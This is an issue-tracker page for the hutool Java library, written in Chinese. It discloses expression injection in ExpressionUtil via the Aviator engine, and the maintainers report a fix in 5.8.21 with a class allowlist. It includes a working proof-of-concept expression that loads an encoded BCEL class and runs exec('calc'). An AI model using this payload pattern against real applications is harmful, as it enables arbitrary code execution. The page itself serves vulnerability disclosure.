3.9K Star 22.1K Fork 7.7K

GVPdromara / hutool

 / 详情

ExpressionUtil 表达式注入

Done
Opened this issue  
2023-01-14 17:44

描述

根据 官方文档 提供的示例,使用 Aviator 模板引擎,当解析不受信任表达式字符串时,可能容易受到代码执行攻击,尽管使用是 Aviator 当前最新的版本(5.3.3)依然会受影响。

输入图片说明

示例

String exp = "'a'+(c=Class.forName(\"$$BCEL$$$l$8b$I$A$A$A$A$A$A$AeP$cbN$c2$40$U$3dCK$5bk$95$97$f8$7e$c4$95$c0$c2$s$c6$j$c6$NjbR$c5$88a_$ca$E$86$40k$da$c1$f0Y$baQ$e3$c2$P$f0$a3$8cw$w$B$a2M$e6$de9$e7$9es$e6$a6_$df$l$9f$ANq$60$p$8b$b2$8dul$a8$b2ib$cb$c46$83q$sB$n$cf$Z$b4J$b5$cd$a07$a2$$g$c8y$o$e4$b7$e3Q$87$c7$P$7egHL$d1$8b$C$7f$d8$f6c$a1$f0$94$d4e_$q$MY$afqsQ$t$c8$t$3c$608$aax$D$ff$c9w$87$7e$d8s$5b2$Wa$af$5e$5d$a0$ee$e2$u$e0IB$G$z$YuU$f4$3f9$83$7d9$J$f8$a3$UQ$98$98$d8$n$dc$8a$c6q$c0$af$84z$d7$a2$f7$8e$95$c9$81$B$d3$c4$ae$83$3d$ec$3bX$c1$w$85$d2$90$n$3f$cflv$G$3c$90$M$a5$94$S$91$7b$dd$9c$853$U$e6$c2$fbq$u$c5$88$f2$ed$k$973P$ae$y$$$3f$a5$eb8$84N$7fT$7d$Z0$b5$GU$8b$90K$9dQ$cf$d6$de$c0$5e$d2$f1$SU$p$r5$d8T$9d_$B$96$e9$G$9a$d2$da$a4R$e6$934$M$b0$de$91$a9$bdB$7b$fe$e37$W$fc$Wr$c8S$_$d0$d1$89$v$d2$v$a5$fa$b5$l$d5$l$f2$9c$f6$B$A$A\",true,new com.sun.org.apache.bcel.internal.util.ClassLoader()) ) + ( c.exec(\"calc\") );";
final Object eval = ExpressionUtil.eval(exp, null);

输入图片说明

Reference

  1. https://github.com/killme2008/aviatorscript/issues/421
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41862
  3. https://mvnrepository.com/artifact/com.googlecode.aviator/aviator

Comments (5)

JOHNSON created任务
JOHNSON changed description
JOHNSON changed description
Expand operation logs

Hutool本身只是表达式引擎的门面,具体实现有漏洞,Hutool也没办法来修补和操控。

只能看实现库是否能解决。不能解决更换引擎。

Looly changed issue state from 待办的 to 已完成
Looly added
 
question
label
Looly changed issue state from 已完成 to 待办的

考虑到不厌其烦的询问,决定:

  1. 6.0.0彻底删除ExpressionUtil

这,貌似也是个解决办法。因为现在很多工具类产品扫描出漏洞,但是没法修复,这样的情况实际上有时候作者是解决不了的。开发又懒得解决,干脆将对应的功能删掉算了。

正解。

Looly changed issue state from 待办的 to 已完成
Looly added
 
bug
label
Looly removed
 
question
label
Looly added
 
enhancement
label
Looly added
 
feature
label
Looly removed
 
enhancement
label
Looly removed
 
bug
label
Looly changed issue state from 已完成 to 待办的
Looly changed issue state from 待办的 to 已完成
Looly added
 
bug
label

5.8.21修复此问题。

增加了allowClassSet

输入图片说明

Sign in to comment

Status
Assignees
Milestones
Pull Requests
Successfully merging a pull request will close this issue.
Branches
Planed to start   -   Planed to end
-
Top level
Priority
参与者(3)
1463 loolly admin 1578914022 1974101 webdjango 1626927187
Java
1
https://gitee.com/dromara/hutool.git
git@gitee.com:dromara/hutool.git
dromara
hutool
hutool

Search